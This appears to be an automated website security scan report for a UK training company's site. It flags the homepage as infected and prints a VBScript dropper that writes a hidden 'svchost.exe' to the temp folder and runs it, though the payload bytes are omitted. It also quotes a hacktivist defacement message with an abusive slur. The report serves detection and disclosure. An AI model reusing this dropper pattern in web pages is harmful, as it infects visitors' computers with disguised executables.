Scanned pages/files
Request | Server response | Status |
http://www.bluewhaletraining.co.uk/ | 200 OK Content-Length: 116922 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below)
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "...[hex-encoded data skipped]..."
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
Antivirus reports:
Deface/Content modification. The following signature was found: Hacked by ...[1221 bytes skipped]... src="https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-xap1/t1.0-9/10371894_691548260939258_388986167118990225_n.jpg"></center> <p align="center"> <body bgcolor="black"> <font size='6' face=' One'style="color: white; text-shadow: 0px 1px 7px aqua";>#OpSaveGaza 11/07/2014</font><br> <font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px red";>Hacked by </font><font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px green";> Samir-Dz </font> <br><font size='3' face=' One'style="color: white; text-shadow: 0px 1px 8px white";>Hi IsraHell , where is the security bitchs?</font><br> <font size='4' face=' One'style="color: yellow; text-shadow: 0px 1px 7px aqua";>Greetings world we are AnonGhost</font><br> <font size='4' face=' One'style="color: a ...[115737 bytes skipped]... | ||
http://www.bluewhaletraining.co.uk/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bluewhaletraining.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bluewhaletraining.co.uk
Referer: http://www.google.com/search?q=bluewhaletraining.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bluewhaletraining.co.uk
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bluewhaletraining.co.uk/
Result: bluewhaletraining.co.uk is not infected or malware details are not published yet.